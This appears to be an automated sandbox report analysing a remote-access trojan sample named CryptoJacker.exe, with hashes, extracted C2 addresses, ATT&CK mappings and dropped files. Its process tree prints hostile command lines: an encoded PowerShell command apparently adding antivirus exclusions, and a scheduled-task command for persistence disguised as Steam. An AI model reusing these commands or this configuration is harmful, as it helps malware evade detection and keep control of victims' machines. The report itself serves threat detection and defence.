Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-07-2024 13:07

General

  • Target

    CryptoJacker.exe

  • Size

    10.6MB

  • MD5

    d8a30735aa4702e200ed432d223c3ad8

  • SHA1

    fa144148c226a9d08e1d1179cfa60597d4f08cac

  • SHA256

    24aeb855ead570407cef3835b4e5ac516e9ec8dd1d0105662727e4f12082b3d2

  • SHA512

    cbc030dd159172c2448554393caeb8b0c910d302dec1edc3a719c47be01bb90a4c243d1d15f0cbfebaf0e016cebec7e5c173c4d5cdd27ffdb557716f2071014a

  • SSDEEP

    196608:g0Kn9PL3A8tKCn4bwcfAjSNgeQ4ZhseG0j73cQIqW3yiFoNWpPm4Q:/KnZQ4n4Z5Ve0PJIf3rFXdm4Q

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

10.0.2.15:9090

10.0.2.15:52033

147.185.221.19:9090

147.185.221.19:52033

Mutex

yigdzohbebyxyvvzbc

Attributes
  • delay

    1

  • install

    true

  • install_file

    Steam.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Async RAT payload 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 17 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\CryptoJacker.exe
    "C:\Users\Admin\AppData\Local\Temp\CryptoJacker.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3128
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAcABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAcgB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAbQB6ACMAPgA="
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1976
    • C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe
      "C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4976
      • C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe
        "C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2204
    • C:\Users\Admin\AppData\Local\Temp\Main.exe
      "C:\Users\Admin\AppData\Local\Temp\Main.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:912
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2284
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2140
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp52A4.tmp.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3368
        • C:\Windows\system32\timeout.exe
          timeout 3
          4⤵
          • Delays execution with timeout.exe
          PID:4676
        • C:\Users\Admin\AppData\Roaming\Steam.exe
          "C:\Users\Admin\AppData\Roaming\Steam.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:5060

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Persistence

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Privilege Escalation

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Main.exe
    Filesize

    74KB

    MD5

    b8ccfc163e2d56a73b6fd7387a45e6eb

    SHA1

    f81a368c275574fa808a92d29c5e0b37e01162ce

    SHA256

    8386fa61b6c5f873c692fbd3b394851ec714e5c852898ef6f622035e4d3d5e84

    SHA512

    8ea7d2ee4fa1f737e7c77dda98963a1c9d3a3276ab0d0d327b5df41682da91996e2e17cbfdb99ddf9399a819c6ec9cdde18b6a8fe6cf221960103b34acb21faf

  • C:\Users\Admin\AppData\Local\Temp\_MEI49762\VCRUNTIME140.dll
    Filesize

    106KB

    MD5

    4585a96cc4eef6aafd5e27ea09147dc6

    SHA1

    489cfff1b19abbec98fda26ac8958005e88dd0cb

    SHA256

    a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

    SHA512

    d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

  • C:\Users\Admin\AppData\Local\Temp\_MEI49762\_bz2.pyd
    Filesize

    82KB

    MD5

    a62207fc33140de460444e191ae19b74

    SHA1

    9327d3d4f9d56f1846781bcb0a05719dea462d74

    SHA256

    ebcac51449f323ae3ae961a33843029c34b6a82138ccd9214cf99f98dd2148c2

    SHA512

    90f9db9ee225958cb3e872b79f2c70cb1fd2248ebaa8f3282afff9250285852156bf668f5cfec49a4591b416ce7ebaaac62d2d887152f5356512f2347e3762b7

  • C:\Users\Admin\AppData\Local\Temp\_MEI49762\_cffi_backend.cp311-win_amd64.pyd
    Filesize

    177KB

    MD5

    210def84bb2c35115a2b2ac25e3ffd8f

    SHA1

    0376b275c81c25d4df2be4789c875b31f106bd09

    SHA256

    59767b0918859beddf28a7d66a50431411ffd940c32b3e8347e6d938b60facdf

    SHA512

    cd5551eb7afd4645860c7edd7b0abd375ee6e1da934be21a6099879c8ee3812d57f2398cad28fbb6f75bba77471d9b32c96c7c1e9d3b4d26c7fc838745746c7f

  • C:\Users\Admin\AppData\Local\Temp\_MEI49762\_ctypes.pyd
    Filesize

    120KB

    MD5

    9b344f8d7ce5b57e397a475847cc5f66

    SHA1

    aff1ccc2608da022ecc8d0aba65d304fe74cdf71

    SHA256

    b1214d7b7efd9d4b0f465ec3463512a1cbc5f59686267030f072e6ce4b2a95cf

    SHA512

    2b0d9e1b550bf108fa842324ab26555f2a224aefff517fdb16df85693e05adaf0d77ebe49382848f1ec68dc9b5ae75027a62c33721e42a1566274d1a2b1baa41

  • C:\Users\Admin\AppData\Local\Temp\_MEI49762\_decimal.pyd
    Filesize

    247KB

    MD5

    692c751a1782cc4b54c203546f238b73

    SHA1

    a103017afb7badaece8fee2721c9a9c924afd989

    SHA256

    c70f05f6bc564fe400527b30c29461e9642fb973f66eec719d282d3d0b402f93

    SHA512

    1b1ad0ca648bd50ce6e6af4be78ad818487aa336318b272417a2e955ead546c9e0864b515150cd48751a03ca8c62f9ec91306cda41baea52452e3fcc24d57d39

  • C:\Users\Admin\AppData\Local\Temp\_MEI49762\_hashlib.pyd
    Filesize

    63KB

    MD5

    787b82d4466f393366657b8f1bc5f1a9

    SHA1

    658639cddda55ac3bfc452db4ec9cf88851e606b

    SHA256

    241322647ba9f94bdc3ae387413ffb57ae14c8cf88bd564a31fe193c6ca43e37

    SHA512

    afcf66962958f38eec8b591aa30d380eb0e1b41028836058ff91b4d1472658de9fba3262f5c27ba688bd73da018e938f398e45911cd37584f623073067f575b6

  • C:\Users\Admin\AppData\Local\Temp\_MEI49762\_lzma.pyd
    Filesize

    155KB

    MD5

    0c7ea68ca88c07ae6b0a725497067891

    SHA1

    c2b61a3e230b30416bc283d1f3ea25678670eb74

    SHA256

    f74aaf0aa08cf90eb1eb23a474ccb7cb706b1ede7f911daf7ae68480765bdf11

    SHA512

    fd52f20496a12e6b20279646663d880b1354cffea10793506fe4560ed7da53e4efba900ae65c9996fbb3179c83844a9674051385e6e3c26fb2622917351846b9

  • C:\Users\Admin\AppData\Local\Temp\_MEI49762\_queue.pyd
    Filesize

    31KB

    MD5

    06248702a6cd9d2dd20c0b1c6b02174d

    SHA1

    3f14d8af944fe0d35d17701033ff1501049e856f

    SHA256

    ac177cd84c12e03e3a68bca30290bc0b8f173eee518ef1fa6a9dce3a3e755a93

    SHA512

    5b22bbff56a8b48655332ebd77387d307f5c0a526626f3654267a34bc4863d8afaf08ff3946606f3cf00b660530389c37bdfac91843808dbebc7373040fec4c1

  • C:\Users\Admin\AppData\Local\Temp\_MEI49762\_socket.pyd
    Filesize

    77KB

    MD5

    26dd19a1f5285712068b9e41808e8fa0

    SHA1

    90c9a112dd34d45256b4f2ed38c1cbbc9f24dba5

    SHA256

    eaabf6b78840daeaf96b5bdbf06adf0e4e2994dfeee5c5e27fefd824dbda5220

    SHA512

    173e1eda05d297d7da2193e8566201f05428437adcac80aecefe80f82d46295b15ce10990b5c080325dc59a432a587eef84a15ec688a62b82493ad501a1e4520

  • C:\Users\Admin\AppData\Local\Temp\_MEI49762\_ssl.pyd
    Filesize

    157KB

    MD5

    ab0e4fbffb6977d0196c7d50bc76cf2d

    SHA1

    680e581c27d67cd1545c810dbb175c2a2a4ef714

    SHA256

    680ad2de8a6cff927822c1d7dd22112a3e8a824e82a7958ee409a7b9ce45ec70

    SHA512

    2bff84a8ec7a26dde8d1bb09792ead8636009c8ef3fa68300a75420197cd7b6c8eaaf8db6a5f97442723e5228afa62961f002948e0eeee8c957c6517547dffba

  • C:\Users\Admin\AppData\Local\Temp\_MEI49762\base_library.zip
    Filesize

    1.4MB

    MD5

    8364dba9ceeb85f3626507e423f68636

    SHA1

    11459bfa8551a196b611a59581e7a577a7f687d1

    SHA256

    515cb3b5f5e4d8d342ee14182856fea014b61caa67623bb16e44388811ed2030

    SHA512

    5f5f957db58d635b14b10abd4d167bc6b5c6ac4bea4c3fe5d7b82fdae4ccfdacf38607cfeadd33d703247c32cbbf70e91a8f2eecc138fa169b70f052a0a1b18a

  • C:\Users\Admin\AppData\Local\Temp\_MEI49762\libcrypto-1_1.dll
    Filesize

    3.3MB

    MD5

    9d7a0c99256c50afd5b0560ba2548930

    SHA1

    76bd9f13597a46f5283aa35c30b53c21976d0824

    SHA256

    9b7b4a0ad212095a8c2e35c71694d8a1764cd72a829e8e17c8afe3a55f147939

    SHA512

    cb39aa99b9d98c735fdacf1c5ed68a4d09d11f30262b91f6aa48c3f8520eff95e499400d0ce7e280ca7a90ff6d7141d2d893ef0b33a8803a1cadb28ba9a9e3e2

  • C:\Users\Admin\AppData\Local\Temp\_MEI49762\libffi-8.dll
    Filesize

    38KB

    MD5

    0f8e4992ca92baaf54cc0b43aaccce21

    SHA1

    c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

    SHA256

    eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

    SHA512

    6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

  • C:\Users\Admin\AppData\Local\Temp\_MEI49762\libssl-1_1.dll
    Filesize

    688KB

    MD5

    bec0f86f9da765e2a02c9237259a7898

    SHA1

    3caa604c3fff88e71f489977e4293a488fb5671c

    SHA256

    d74ce01319ae6f54483a19375524aa39d9f5fd91f06cf7df238ca25e043130fd

    SHA512

    ffbc4e5ffdb49704e7aa6d74533e5af76bbe5db297713d8e59bd296143fe5f145fbb616b343eed3c48eceaccccc2431630470d8975a4a17c37eafcc12edd19f4

  • C:\Users\Admin\AppData\Local\Temp\_MEI49762\python3.DLL
    Filesize

    65KB

    MD5

    7442c154565f1956d409092ede9cc310

    SHA1

    c72f9c99ea56c8fb269b4d6b3507b67e80269c2d

    SHA256

    95086ac060ffe6933ac04a6aa289b1c7d321f14380315e24ba0d6c4adfa0842b

    SHA512

    2bf96828534bcdf71e48d1948b989011d8e3ba757c38cc17905a13d3021ea5deb57e2c68d79507a6acbb62be009cfc85b24d14543958dba1d3bc3e4ca7d4f844

  • C:\Users\Admin\AppData\Local\Temp\_MEI49762\python311.dll
    Filesize

    5.5MB

    MD5

    e2bd5ae53427f193b42d64b8e9bf1943

    SHA1

    7c317aad8e2b24c08d3b8b3fba16dd537411727f

    SHA256

    c4844b05e3a936b130adedb854d3c04d49ee54edb43e9d36f8c4ae94ccb78400

    SHA512

    ae23a6707e539c619fd5c5b4fc6e4734edc91f89ebe024d25ff2a70168da6105ac0bd47cf6bf3715af6411963caf0acbb4632464e1619ca6361abf53adfe7036

  • C:\Users\Admin\AppData\Local\Temp\_MEI49762\select.pyd
    Filesize

    29KB

    MD5

    756c95d4d9b7820b00a3099faf3f4f51

    SHA1

    893954a45c75fb45fe8048a804990ca33f7c072d

    SHA256

    13e4d9a734a453a3613e11b6a518430099ad7e3d874ea407d1f9625b7f60268a

    SHA512

    0f54f0262cf8d71f00bf5666eb15541c6ecc5246cd298efd3b7dd39cdd29553a8242d204c42cfb28c537c3d61580153200373c34a94769f102b3baa288f6c398

  • C:\Users\Admin\AppData\Local\Temp\_MEI49762\unicodedata.pyd
    Filesize

    1.1MB

    MD5

    58f7988b50cba7b793884f580c7083e1

    SHA1

    d52c06b19861f074e41d8b521938dee8b56c1f2e

    SHA256

    e36d14cf49ca2af44fae8f278e883341167bc380099dac803276a11e57c9cfa1

    SHA512

    397fa46b90582f8a8cd7df23b722204c38544717bf546837c45e138b39112f33a1850be790e248fca5b5ecd9ed7c91cd1af1864f72717d9805c486db0505fb9c

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ejhphxlk.z43.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe
    Filesize

    10.5MB

    MD5

    ccb8c058314c049211a16c6291182261

    SHA1

    f47c9a4cb2b48e5ede2d4a4bd934c2cd98cd9b90

    SHA256

    30da0a0cf38714ea7b3c3f1b6c30f810912e7cae78a053511ba1b3e03c9b6499

    SHA512

    c878cf36309e91450791a6e4e0c3163b1226bbfcb6fdcdb3d421f228ed5c65771d3982f7f6ca24d5946f41aed5447de446f80fd92abeee6231d79f4860c76c71

  • C:\Users\Admin\AppData\Local\Temp\tmp52A4.tmp.bat
    Filesize

    149B

    MD5

    c15ee9a257c5e727c1468c9bcedee5e6

    SHA1

    aa714e11c93d62f6aa7f1cb022bacf7fdc234d74

    SHA256

    bffc06483844a448bb4f70648af75843b54389073a33c5013a7bd016528f9039

    SHA512

    5c6619a41234d15a1faf7e7ff2ddf32e4b3abb9ce81160bd6adb2a87e82f10b33cb49e6c73a8fb7f1ce8193b3cebda2d8e3a55d57e1edd7d0b777df045a0ede3

  • C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
    Filesize

    8B

    MD5

    cf759e4c5f14fe3eec41b87ed756cea8

    SHA1

    c27c796bb3c2fac929359563676f4ba1ffada1f5

    SHA256

    c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

    SHA512

    c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

  • memory/912-26-0x000000001B0E0000-0x000000001B0F0000-memory.dmp
    Filesize

    64KB

  • memory/912-20-0x00000000003D0000-0x00000000003E8000-memory.dmp
    Filesize

    96KB

  • memory/912-19-0x00007FFC9B8F3000-0x00007FFC9B8F5000-memory.dmp
    Filesize

    8KB

  • memory/1976-58-0x00000000055F0000-0x0000000005656000-memory.dmp
    Filesize

    408KB

  • memory/1976-95-0x0000000005C80000-0x0000000005CCC000-memory.dmp
    Filesize

    304KB

  • memory/1976-94-0x0000000005C40000-0x0000000005C5E000-memory.dmp
    Filesize

    120KB

  • memory/1976-70-0x0000000005760000-0x0000000005AB4000-memory.dmp
    Filesize

    3.3MB

  • memory/1976-56-0x0000000005580000-0x00000000055E6000-memory.dmp
    Filesize

    408KB

  • memory/1976-49-0x0000000004E90000-0x0000000004EB2000-memory.dmp
    Filesize

    136KB

  • memory/1976-24-0x0000000004F50000-0x0000000005578000-memory.dmp
    Filesize

    6.2MB

  • memory/1976-25-0x0000000004910000-0x0000000004920000-memory.dmp
    Filesize

    64KB

  • memory/1976-22-0x0000000004910000-0x0000000004920000-memory.dmp
    Filesize

    64KB

  • memory/1976-21-0x0000000002660000-0x0000000002696000-memory.dmp
    Filesize

    216KB

  • memory/1976-113-0x0000000074D70000-0x0000000074DBC000-memory.dmp
    Filesize

    304KB

  • memory/1976-123-0x0000000006E10000-0x0000000006E2E000-memory.dmp
    Filesize

    120KB

  • memory/1976-124-0x0000000006E30000-0x0000000006ED3000-memory.dmp
    Filesize

    652KB

  • memory/1976-112-0x0000000006210000-0x0000000006242000-memory.dmp
    Filesize

    200KB

  • memory/1976-125-0x00000000075B0000-0x0000000007C2A000-memory.dmp
    Filesize

    6.5MB

  • memory/1976-126-0x0000000006F70000-0x0000000006F8A000-memory.dmp
    Filesize

    104KB

  • memory/1976-127-0x0000000006FF0000-0x0000000006FFA000-memory.dmp
    Filesize

    40KB

  • memory/1976-128-0x00000000071F0000-0x0000000007286000-memory.dmp
    Filesize

    600KB

  • memory/1976-129-0x0000000007170000-0x0000000007181000-memory.dmp
    Filesize

    68KB

  • memory/1976-130-0x00000000071B0000-0x00000000071BE000-memory.dmp
    Filesize

    56KB

  • memory/1976-131-0x00000000071C0000-0x00000000071D4000-memory.dmp
    Filesize

    80KB

  • memory/1976-132-0x00000000072B0000-0x00000000072CA000-memory.dmp
    Filesize

    104KB

  • memory/1976-133-0x0000000007290000-0x0000000007298000-memory.dmp
    Filesize

    32KB

  • memory/1976-5-0x000000007378E000-0x000000007378F000-memory.dmp
    Filesize

    4KB